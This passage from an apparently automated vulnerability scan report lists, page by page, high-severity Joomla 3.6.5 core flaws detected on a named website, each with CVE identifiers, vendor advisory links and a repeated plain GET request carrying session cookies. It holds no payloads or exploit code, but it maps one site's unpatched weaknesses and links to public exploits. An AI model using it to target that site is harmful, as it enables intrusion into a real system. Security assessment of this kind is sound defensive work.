CVE-2020-35611 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35611)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
151
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Information Disclosure (2.5.0 - 3.9.22)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions ranging from 2.5.0 and up to and including
3.9.22 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/828-20201101-core-com-finder-ignores-access-levels-on-autosuggest.html
(https://developer.joomla.org/security-centre/828-20201101-core-com-finder-ignores-access-levels-on-autosuggest.html)
CVE-2020-35610 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35610)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
152
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Local File Inclusion (2.5.0 - 3.8.8)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions ranging from 2.5.0 and up to and including 3.8.8 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/741-20180601-core-local-file-inclusion-with-php-5-3
(https://developer.joomla.org/security-centre/741-20180601-core-local-file-inclusion-with-php-5-3)
CVE-2018-12712 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12712)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
153
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Multiple Cross-Site Scripting Vulnerabilities (1.5.0 - 3.8.7)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the
context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other
attacks. Joomla! Core versions ranging from 1.5.0 and up to and including 3.8.7 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/737-20180509-core-xss-vulnerability-in-the-media-manager.html
(https://developer.joomla.org/security-centre/737-20180509-core-xss-vulnerability-in-the-media-manager.html)
CVE-2018-6378 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6378)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
154
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Multiple Cross-Site Scripting Vulnerabilities (2.5.0 - 3.9.1)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the
context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other
attacks. Joomla! Core versions ranging from 2.5.0 and up to and including 3.9.1 are vulnerable.
Impact
Recommendation
References
https://www.exploit-db.com/exploits/46200 (https://www.exploit-db.com/exploits/46200)
https://packetstormsecurity.com/files/151234/Joomla-3.9.1-Cross-Site-Scripting.html
(https://packetstormsecurity.com/files/151234/Joomla-3.9.1-Cross-Site-Scripting.html)
https://developer.joomla.org/security-centre/760-20190101-core-stored-xss-in-mod-banners
(https://developer.joomla.org/security-centre/760-20190101-core-stored-xss-in-mod-banners)
https://developer.joomla.org/security-centre/761-20190102-core-stored-xss-in-com-contact.html
(https://developer.joomla.org/security-centre/761-20190102-core-stored-xss-in-com-contact.html)
https://developer.joomla.org/security-centre/762-20190103-core-stored-xss-issue-in-the-global-configuration-textfilter-
settings.html (https://developer.joomla.org/security-centre/762-20190103-core-stored-xss-issue-in-the-global-configuration-
textfilter-settings.html)
https://developer.joomla.org/security-centre/763-20190104-core-stored-xss-issue-in-the-global-configuration-help-url.html
(https://developer.joomla.org/security-centre/763-20190104-core-stored-xss-issue-in-the-global-configuration-help-url.html)
CVE-2019-6261 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6261)
CVE-2019-6262 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6262)
CVE-2019-6263 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6263)
CVE-2019-6264 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6264)
Affected items
155
Web Server
Details
Current Joomla! version: 3.6.5.
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Multiple SQL Injection Vulnerabilities (2.5.0 - 3.9.13)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to multiple SQL injection vulnerabilities because it fails to sufficiently sanitize user-supplied data
before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database. Joomla! Core versions ranging from 2.5.0 and up to
and including 3.9.13 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/797-20191202-core-various-sql-injections-through-configuration-
parameters.html (https://developer.joomla.org/security-centre/797-20191202-core-various-sql-injections-through-
configuration-parameters.html)
CVE-2019-19846 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19846)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
156
Request headers
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Multiple Vulnerabilities (1.5.0 - 3.7.2)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to multiple vulnerabilities, including cross-site scripting and information disclosure vulnerabilities.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in
the context of the affected site, allowing the attacker to steal cookie-based authentication credentials, or to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions ranging from 1.5.0 and up to and including
3.7.2 are vulnerable.
Impact
Recommendation
References
http://blog.fortinet.com/2017/05/04/multiple-joomla-core-xss-vulnerabilities-are-discovered
(http://blog.fortinet.com/2017/05/04/multiple-joomla-core-xss-vulnerabilities-are-discovered)
https://developer.joomla.org/security-centre/683-core-information-disclosure.html (https://developer.joomla.org/security-
centre/683-core-information-disclosure.html)
https://developer.joomla.org/security-centre/685-core-xss-vulnerability.html (https://developer.joomla.org/security-
centre/685-core-xss-vulnerability.html)
https://developer.joomla.org/security-centre/686-core-xss-vulnerability.html (https://developer.joomla.org/security-
centre/686-core-xss-vulnerability.html)
https://fortiguard.com/zeroday/FG-VD-17-107 (https://fortiguard.com/zeroday/FG-VD-17-107)
https://developer.joomla.org/security-centre/698-20170603-core-xss-vulnerability.html
(https://developer.joomla.org/security-centre/698-20170603-core-xss-vulnerability.html)
CVE-2017-7983 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7983)
CVE-2017-7985 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7985)
CVE-2017-7986 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7986)
Affected items
157
Web Server
Details
Current Joomla! version: 3.6.5.
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Multiple Vulnerabilities (1.5.0 - 3.8.11)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to multiple vulnerabilities, including cross-site scripting and arbitrary file upload vulnerabilities. An
attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site, allowing the attacker to steal cookie-based authentication credentials, or to upload arbitrary code and run
it in the context of the webserver process, which may facilitate unauthorized access or privilege escalation. Joomla! Core
versions ranging from 1.5.0 and up to and including 3.8.11 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/743-20180801-core-hardening-the-inputfilter-for-phar-stubs.html
(https://developer.joomla.org/security-centre/743-20180801-core-hardening-the-inputfilter-for-phar-stubs.html)
https://developer.joomla.org/security-centre/744-20180802-core-stored-xss-vulnerability-in-the-frontend-profile.html
(https://developer.joomla.org/security-centre/744-20180802-core-stored-xss-vulnerability-in-the-frontend-profile.html)
CVE-2018-15880 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15880)
CVE-2018-15882 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15882)
Affected items
Web Server
158
Details
Current Joomla! version: 3.6.5.
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Multiple Vulnerabilities (1.7.3 - 3.7.2)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to multiple vulnerabilities, including cross-site scripting and information disclosure vulnerabilities.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in
the context of the affected site, allowing the attacker to steal cookie-based authentication credentials, or to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions ranging from 1.7.3 and up to and including
3.7.2 are vulnerable.
Impact
Recommendation
References
https://github.com/xyringe/CVE-2017-9934 (https://github.com/xyringe/CVE-2017-9934)
https://developer.joomla.org/security-centre/696-20170601-core-information-disclosure
(https://developer.joomla.org/security-centre/696-20170601-core-information-disclosure)
https://developer.joomla.org/security-centre/697-20170602-core-xss-vulnerability.html
(https://developer.joomla.org/security-centre/697-20170602-core-xss-vulnerability.html)
CVE-2017-9933 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9933)
CVE-2017-9934 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9934)
Affected items
Web Server
Details
159
Current Joomla! version: 3.6.5.
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Multiple Vulnerabilities (2.5.0 - 3.8.12)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to multiple vulnerabilities, including security bypass and cross-site request forgery vulnerabilities.
Exploiting these issues could allow an attacker to bypass intended access restrictions and perform otherwise restricted
actions, or to perform certain administrative actions and gain unauthorized access to the affected application. Joomla! Core
versions ranging from 2.5.0 and up to and including 3.8.12 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/751-20181001-core-hardening-com-contact-contact-form.html
(https://developer.joomla.org/security-centre/751-20181001-core-hardening-com-contact-contact-form.html)
https://developer.joomla.org/security-centre/755-20181005-core-csrf-hardening-in-com-installer.html
(https://developer.joomla.org/security-centre/755-20181005-core-csrf-hardening-in-com-installer.html)
CVE-2018-17858 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17858)
CVE-2018-17859 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17859)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
160
Request headers
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Multiple Vulnerabilities (2.5.0 - 3.9.2)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to multiple vulnerabilities, including cross-site scripting and PHP object injection vulnerabilities.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in
the context of the affected site, allowing the attacker to steal cookie-based authentication credentials and launch other
attacks, or to possibly execute arbitrary PHP code within the context of the affected webserver process. Joomla! Core
versions ranging from 2.5.0 and up to and including 3.9.2 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/765-20190201-core-lack-of-url-filtering-in-various-core-components.html
(https://developer.joomla.org/security-centre/765-20190201-core-lack-of-url-filtering-in-various-core-components.html)
https://developer.joomla.org/security-centre/767-20190203-core-additional-warning-in-the-global-configuration-textfilter-
settings.html (https://developer.joomla.org/security-centre/767-20190203-core-additional-warning-in-the-global-
configuration-textfilter-settings.html)
https://developer.joomla.org/security-centre/768-20190204-core-stored-xss-issue-in-the-global-configuration-help-url-2.html
(https://developer.joomla.org/security-centre/768-20190204-core-stored-xss-issue-in-the-global-configuration-help-url-
2.html)
https://developer.joomla.org/security-centre/769-20190205-core-xss-issue-in-core-js-writedynalist.html
(https://developer.joomla.org/security-centre/769-20190205-core-xss-issue-in-core-js-writedynalist.html)
https://developer.joomla.org/security-centre/770-20190206-core-implement-the-typo3-phar-stream-wrapper.html
(https://developer.joomla.org/security-centre/770-20190206-core-implement-the-typo3-phar-stream-wrapper.html)
CVE-2019-7739 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7739)
CVE-2019-7740 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7740)
161
CVE-2019-7741 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7741)
CVE-2019-7743 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7743)
CVE-2019-7744 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7744)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core PHP Object Injection (2.5.4 - 3.8.12)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a vulnerability that lets remote attackers inject and execute arbitrary code because the application
fails to sanitize user-supplied input before being passed to the unserialize() PHP function. Attackers can possibly exploit
this issue to execute arbitrary PHP code within the context of the affected webserver process. Joomla! Core versions
ranging from 2.5.4 and up to and including 3.8.12 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/752-20181002-core-inadequate-default-access-level-for-com-
joomlaupdate.html (https://developer.joomla.org/security-centre/752-20181002-core-inadequate-default-access-level-for-
com-joomlaupdate.html)
CVE-2018-17856 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17856)
Affected items
162
Web Server
Details
Current Joomla! version: 3.6.5.
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Security Bypass (1.5.0 - 3.8.12)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 1.5.0 and up to and
including 3.8.12 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/754-20181004-core-acl-violation-in-com-users-for-the-admin-verification.html
(https://developer.joomla.org/security-centre/754-20181004-core-acl-violation-in-com-users-for-the-admin-verification.html)
CVE-2018-17855 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17855)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
163
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Security Bypass (1.6.0 - 3.6.5)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise
restricted actions and subsequently overwrite the author of an article. Joomla! Core versions ranging from 1.6.0 and up to
and including 3.6.5 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/688-core-acl-violations.html (https://developer.joomla.org/security-centre/688-
core-acl-violations.html)
CVE-2017-7988 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7988)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
164
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Security Bypass (1.6.0 - 3.9.24)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 1.6.0 and up to and
including 3.9.24 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/849-20210309-core-inadequate-filtering-of-form-contents-could-allow-to-
overwrite-the-author-field.html (https://developer.joomla.org/security-centre/849-20210309-core-inadequate-filtering-of-
form-contents-could-allow-to-overwrite-the-author-field.html)
CVE-2021-26029 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26029)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
165
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Security Bypass (1.6.2 - 3.9.10)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 1.6.2 and up to and
including 3.9.10 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/789-20190801-core-hardening-com-contact-contact-form.html
(https://developer.joomla.org/security-centre/789-20190801-core-hardening-com-contact-contact-form.html)
CVE-2019-15028 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15028)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
166
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Security Bypass (1.7.0 - 3.9.22)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 1.7.0 and up to and
including 3.9.22 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/834-20201107-core-write-acl-violation-in-multiple-core-views.html
(https://developer.joomla.org/security-centre/834-20201107-core-write-acl-violation-in-multiple-core-views.html)
CVE-2020-35616 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35616)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
167
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Security Bypass (2.5.0 - 3.8.7)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise
restricted actions and subsequently modify the access levels of user groups with higher permissions. Joomla! Core
versions ranging from 2.5.0 and up to and including 3.8.7 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/729-20180501-core-acl-violation-in-access-levels.html
(https://developer.joomla.org/security-centre/729-20180501-core-acl-violation-in-access-levels.html)
CVE-2018-11323 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11323)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
168
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Security Bypass (2.5.0 - 3.9.15)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.15 are vulnerable.
Impact
Recommendation
References
https://hocvahoc.me/2020/03/13/my-journey-to-find-out-joomlas-cvepart-1/ (https://hocvahoc.me/2020/03/13/my-journey-to-
find-out-joomlas-cvepart-1/)
https://github.com/HoangKien1020/Joomla-CVE/tree/master/CVE-2020-10238 (https://github.com/HoangKien1020/Joomla-
CVE/tree/master/CVE-2020-10238)
https://developer.joomla.org/security-centre/804-20200303-core-incorrect-access-control-in-com-templates.html
(https://developer.joomla.org/security-centre/804-20200303-core-incorrect-access-control-in-com-templates.html)
CVE-2020-10238 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10238)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
169
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Security Bypass (2.5.0 - 3.9.16)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.16 are vulnerable.
Impact
Recommendation
References
https://github.com/HoangKien1020/CVE-2020-11890 (https://github.com/HoangKien1020/CVE-2020-11890)
https://developer.joomla.org/security-centre/810-20200402-core-missing-checks-for-the-root-usergroup-in-usergroup-
table.html (https://developer.joomla.org/security-centre/810-20200402-core-missing-checks-for-the-root-usergroup-in-
usergroup-table.html)
CVE-2020-11890 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11890)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
170
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Security Bypass (2.5.0 - 3.9.16)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.16 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/811-20200403-core-incorrect-access-control-in-com-users-access-level-
deletion-function.html (https://developer.joomla.org/security-centre/811-20200403-core-incorrect-access-control-in-com-
users-access-level-deletion-function.html)
CVE-2020-11889 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11889)
Affected items
Web Server
Details
